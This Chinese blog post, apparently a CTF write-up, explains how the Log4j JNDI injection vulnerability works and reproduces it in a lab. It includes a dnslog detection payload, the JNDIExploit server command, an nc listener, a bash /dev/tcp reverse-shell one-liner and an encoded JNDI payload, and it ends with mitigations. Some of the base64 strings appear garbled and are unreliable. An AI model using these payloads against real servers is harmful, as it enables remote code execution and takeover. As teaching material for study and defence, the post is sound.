log4j漏洞原理

标签：重定向 JNDI 接口 log4j 漏洞 LDAP 原理 Log4j

一.前置知识

1.JNDI接口

JNDI即Java Naming and Directory Interface（JAVA命名和目录接口），它提供一个目录系统，并将服务名称与对象关联起来，从而使得开发人员在开发过程中可以使用名称来访问对象。

有一个类似于字典的数据源，你可以通过JNDI接口，传一个name进去，就能获取到对象了。

2.LDAP协议

LDAP称为轻量级目录访问协议，既是一种服务，也是一种协议，是JNDI的一种底层实现，主要功能是提供命名关键字到对象的映射目录，开发人员可以通过输入名称，获取到对象的内容。

有一个类似于字典的数据源，你可以通过LDAP协议，传一个name进去，就能获取到数据。

3.RMI协议

JAVA的一种远程接口调用协议，在TCP协议上传递可序列化的Java对象，即可以实现调用远程方法和调用本地方法一样简单。

4.Log4j

Log4j是由Apache提供的日志操作包，用于帮助用户处理日志信息。通过Log4j，可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。

二.Log4j漏洞的成因

Log4j为了输出日志时能输出任意位置的Java对象，引入了Lookup接口，这个Lookup接口可以看作是JNDI的一种实现，允许按照具体的名称逻辑查找对象的位置，并输出对象的内容，此对象可以通过Java的序列化或反序列化传输，从远程服务器上查找。

由于Lookup接口的原因，Log4j就暗含JNDI注入漏洞，可以联合使用JNDI+LDAP或者JNDI+RMI通过命名功能直接从远程服务器上调用文件并在本地执行。

Log4j在处理消息转换时，会按照字符检测每条日志，当日志中包含${}时，则会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容），使用LDAP或RMI协议，能从远程服务区上请求恶意的对象，对象在调用的过程中会被解析执行，导致了Log4j的漏洞。

三.漏洞复现

1.ctfshow的log4j复现

2.打开环境，写上payload：${jndi:ldap://ntoand.dnslog.cn}先用dnslog检测漏洞是否存在

3.可以看到，是有解析记录的，原理如下：

4.浅浅漏洞利用一下吧~

在远程vps上搭建LDAP服务器，并将恶意代码编译并挂在服务器上，对JAVA不太熟练，直接使用JNDIExploit工具进行搭建：

GitHub链接：Yihsiwei/Log4j-exp: 帮助你快速复现Log4j漏洞 (github.com)

下载工具后，放到公网VPS上，记得防火墙放行端口

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i X.X.X.X -p 4444

用nc监听端口

nc -lvp 5555

制作poc，通过bash -i >& /dev/tcp/x.x.x.x/5555 0>&1反弹shell

说明：

bash -i 指开启一个交互式的Shell

&符号用于区分文件和文件描述符

&表示标准输出或标准错误输出重定向到文件

0指标准输入重定向，1指标准输出重定向，2指错误输出重定向

/dev/tcp指linux下的特殊设备，可用于建立Socket连接

bash -i >& /dev/tcp/120.x.7x.2x.17x/5555 0>&1 指将标准输出重定向到/dev/tcp/ip/port端口文件中即重定向到攻击机，靶机的标准输入被重定向到了标准输出，标准输出重定向到了攻击机，因此标准输入也就重定向到了攻击机，所以可以看到攻击机输入命令并看到结果。

POC为：

${jndi:ldap://x.x.x.x:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2BJiAV2L3RjcC8xOTUuMTMzLjUuMzc1NSAwPiYx}

注意：bash -i >& /dev/tcp/x.x.x.x/5555 0>&1需要base64编码+url编码工具才能识别

base64编码后：YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTUuMzLzcvNTU1NSAwPiYx

Url编码后：YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTUuMTMMzcvNTU1NPiYx

点击提交，看到shell反弹回来了

log4j漏洞攻击成功~

四、Log4j的临时缓解措施

关闭lookup功能：

（1）设置log4j2.formatMsgNoLookups=True

（2）Dlog4j2.formatMsgNoLookups=true。

（3）设置系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS为true

（4）采用防火墙对请求流量中的${jndi进行拦截，防止JNDI注入。

（5）禁止存在漏洞的业务访问外网，主动外连外网。

标签：重定向,JNDI,接口,log4j,漏洞,LDAP,原理,Log4j
From： https://www.cnblogs.com/Cai-Xiaobai/p/16902905.html